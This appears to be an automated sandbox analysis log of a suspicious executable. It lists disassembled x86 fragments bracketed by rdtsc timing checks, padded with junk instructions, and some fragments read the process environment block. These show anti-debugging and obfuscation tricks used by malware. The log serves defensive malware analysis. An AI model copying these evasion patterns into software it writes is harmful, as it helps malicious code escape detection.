Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157A1F8 second address: 157A210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e pushad 0x0000000f jns 00007FA278C0D016h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157A210 second address: 157A217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157A46D second address: 157A473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157A473 second address: 157A47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157A8D4 second address: 157A8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jl 00007FA278C0D022h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157A8E1 second address: 157A8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA278C27B76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157ACDC second address: 157ACE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157AE3D second address: 157AE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA278C27B76h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157C72B second address: 157C72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157F26D second address: 157F271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157F31D second address: 157F35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jc 00007FA278C0D020h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jns 00007FA278C0D016h 0x00000016 popad 0x00000017 nop 0x00000018 jo 00007FA278C0D01Ch 0x0000001e mov edx, dword ptr [ebp+122D3615h] 0x00000024 push 00000004h 0x00000026 sub dword ptr [ebp+1245AD7Dh], edx 0x0000002c call 00007FA278C0D019h 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 ja 00007FA278C0D016h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157F35B second address: 157F35F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157F35F second address: 157F387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FA278C0D018h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edi 0x00000011 jng 00007FA278C0D018h 0x00000017 push edx 0x00000018 pop edx 0x00000019 pop edi 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jl 00007FA278C0D024h 0x00000024 push eax 0x00000025 push edx 0x00000026 push edi 0x00000027 pop edi 0x00000028 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157F387 second address: 157F38B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1582D57 second address: 1582D71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D025h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570047 second address: 757004B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757004B second address: 757004F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757004F second address: 7570055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570055 second address: 7570085 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D020h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA278C0D027h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570085 second address: 757008B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757008B second address: 757009B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757009B second address: 75700B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B87h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75700B6 second address: 7570105 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000030h] 0x00000011 pushad 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 mov bl, al 0x00000018 popad 0x00000019 sub esp, 18h 0x0000001c jmp 00007FA278C0D021h 0x00000021 xchg eax, ebx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FA278C0D01Ah 0x0000002a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570105 second address: 7570117 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 01A1h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, esi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570117 second address: 757011B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757011B second address: 757011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757011F second address: 7570125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570125 second address: 757012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757012B second address: 757012F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757012F second address: 7570166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FA278C27B81h 0x00000010 mov ecx, 12C47A57h 0x00000015 popad 0x00000016 jmp 00007FA278C27B7Ch 0x0000001b popad 0x0000001c mov ebx, dword ptr [eax+10h] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 mov edi, esi 0x00000024 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570166 second address: 75701AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, esi 0x00000006 jmp 00007FA278C0D01Eh 0x0000000b push eax 0x0000000c jmp 00007FA278C0D01Bh 0x00000011 xchg eax, esi 0x00000012 jmp 00007FA278C0D026h 0x00000017 mov esi, dword ptr [772406ECh] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov cl, dh 0x00000022 push eax 0x00000023 pop edx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75701AB second address: 7570226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 2A942A64h 0x00000008 pushfd 0x00000009 jmp 00007FA278C27B7Dh 0x0000000e or ax, 0EA6h 0x00000013 jmp 00007FA278C27B81h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c test esi, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007FA278C27B83h 0x00000026 pop ecx 0x00000027 pushfd 0x00000028 jmp 00007FA278C27B89h 0x0000002d adc si, D166h 0x00000032 jmp 00007FA278C27B81h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570226 second address: 757022C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757022C second address: 7570240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FA278C28B32h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570240 second address: 7570246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570246 second address: 7570260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B86h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570260 second address: 757029E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FA278C0D022h 0x00000015 jmp 00007FA278C0D025h 0x0000001a popfd 0x0000001b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757029E second address: 757031D instructions: 0x00000000 rdtsc 0x00000002 mov ax, 5F37h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FA278C27B7Ch 0x0000000e and cl, 00000028h 0x00000011 jmp 00007FA278C27B7Bh 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FA278C27B7Fh 0x00000020 and al, 0000006Eh 0x00000023 jmp 00007FA278C27B89h 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007FA278C27B80h 0x0000002f sbb ah, FFFFFFE8h 0x00000032 jmp 00007FA278C27B7Bh 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, edi 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushad 0x0000003e popad 0x0000003f movsx edx, si 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757031D second address: 7570378 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA278C0D029h 0x00000009 adc si, 19B6h 0x0000000e jmp 00007FA278C0D021h 0x00000013 popfd 0x00000014 jmp 00007FA278C0D020h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c call dword ptr [77210B60h] 0x00000022 mov eax, 766BE5E0h 0x00000027 ret 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FA278C0D01Ah 0x00000031 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570378 second address: 7570387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570387 second address: 757038D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757038D second address: 75703E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000044h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA278C27B84h 0x00000014 or cx, B198h 0x00000019 jmp 00007FA278C27B7Bh 0x0000001e popfd 0x0000001f push ecx 0x00000020 call 00007FA278C27B7Fh 0x00000025 pop eax 0x00000026 pop ebx 0x00000027 popad 0x00000028 pop edi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FA278C27B7Bh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75703E8 second address: 757049B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FA278C0D01Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov cx, dx 0x00000014 pushfd 0x00000015 jmp 00007FA278C0D01Dh 0x0000001a jmp 00007FA278C0D01Bh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 pushad 0x00000023 push eax 0x00000024 pop esi 0x00000025 call 00007FA278C0D027h 0x0000002a mov eax, 0573E2CFh 0x0000002f pop esi 0x00000030 popad 0x00000031 push dword ptr [eax] 0x00000033 jmp 00007FA278C0D01Bh 0x00000038 mov eax, dword ptr fs:[00000030h] 0x0000003e jmp 00007FA278C0D026h 0x00000043 push dword ptr [eax+18h] 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FA278C0D027h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757049B second address: 75704B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75705BD second address: 75705EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA278C0D020h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75705EB second address: 75705EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75705EF second address: 75705F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75705F5 second address: 75705FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75705FB second address: 75705FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75705FF second address: 75706A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+4Ch] 0x0000000b jmp 00007FA278C27B84h 0x00000010 mov dword ptr [esi+10h], eax 0x00000013 pushad 0x00000014 mov ax, 849Dh 0x00000018 mov bx, cx 0x0000001b popad 0x0000001c mov eax, dword ptr [ebx+50h] 0x0000001f jmp 00007FA278C27B84h 0x00000024 mov dword ptr [esi+14h], eax 0x00000027 pushad 0x00000028 jmp 00007FA278C27B7Eh 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FA278C27B7Ch 0x00000034 add cx, 0B88h 0x00000039 jmp 00007FA278C27B7Bh 0x0000003e popfd 0x0000003f popad 0x00000040 popad 0x00000041 mov eax, dword ptr [ebx+54h] 0x00000044 jmp 00007FA278C27B86h 0x00000049 mov dword ptr [esi+18h], eax 0x0000004c jmp 00007FA278C27B80h 0x00000051 mov eax, dword ptr [ebx+58h] 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 mov ebx, eax 0x00000059 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75706A8 second address: 75706FA instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ecx, edx 0x00000009 popad 0x0000000a mov dword ptr [esi+1Ch], eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA278C0D01Dh 0x00000014 and cx, 7AB6h 0x00000019 jmp 00007FA278C0D021h 0x0000001e popfd 0x0000001f movzx esi, di 0x00000022 popad 0x00000023 mov eax, dword ptr [ebx+5Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FA278C0D026h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75706FA second address: 7570723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+20h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA278C27B85h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570723 second address: 7570733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C0D01Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570733 second address: 7570767 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+60h] 0x0000000e pushad 0x0000000f push esi 0x00000010 mov bh, 09h 0x00000012 pop esi 0x00000013 popad 0x00000014 mov dword ptr [esi+24h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FA278C27B85h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570767 second address: 757076D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757076D second address: 7570771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570771 second address: 7570793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+64h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570793 second address: 7570797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570797 second address: 757079D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757079D second address: 75707CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c jmp 00007FA278C27B80h 0x00000011 mov eax, dword ptr [ebx+68h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop eax 0x00000019 mov dx, 312Ch 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75707CB second address: 75707E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C0D021h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75707E0 second address: 7570812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+2Ch], eax 0x0000000e jmp 00007FA278C27B7Eh 0x00000013 mov ax, word ptr [ebx+6Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570812 second address: 7570816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570816 second address: 757081C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757081C second address: 7570840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D024h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d pushad 0x0000000e mov di, ax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570840 second address: 7570844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570844 second address: 757086B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D026h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ax, word ptr [ebx+00000088h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757086B second address: 75708DC instructions: 0x00000000 rdtsc 0x00000002 mov esi, 0ACD785Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FA278C27B84h 0x0000000f xor eax, 4A73FCC8h 0x00000015 jmp 00007FA278C27B7Bh 0x0000001a popfd 0x0000001b popad 0x0000001c mov word ptr [esi+32h], ax 0x00000020 pushad 0x00000021 call 00007FA278C27B84h 0x00000026 movzx esi, di 0x00000029 pop ebx 0x0000002a mov ecx, 57B2D6C3h 0x0000002f popad 0x00000030 mov eax, dword ptr [ebx+0000008Ch] 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FA278C27B85h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75708DC second address: 75708E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75708E2 second address: 75708E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75708E6 second address: 757094A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+34h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FA278C0D01Bh 0x00000015 adc eax, 21D2CE7Eh 0x0000001b jmp 00007FA278C0D029h 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [ebx+18h] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007FA278C0D023h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757094A second address: 75709E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA278C27B89h 0x00000013 and cx, 3CC6h 0x00000018 jmp 00007FA278C27B81h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FA278C27B80h 0x00000024 and eax, 1CACFD68h 0x0000002a jmp 00007FA278C27B7Bh 0x0000002f popfd 0x00000030 popad 0x00000031 mov eax, dword ptr [ebx+1Ch] 0x00000034 jmp 00007FA278C27B86h 0x00000039 mov dword ptr [esi+3Ch], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA278C27B87h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75709E1 second address: 75709E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
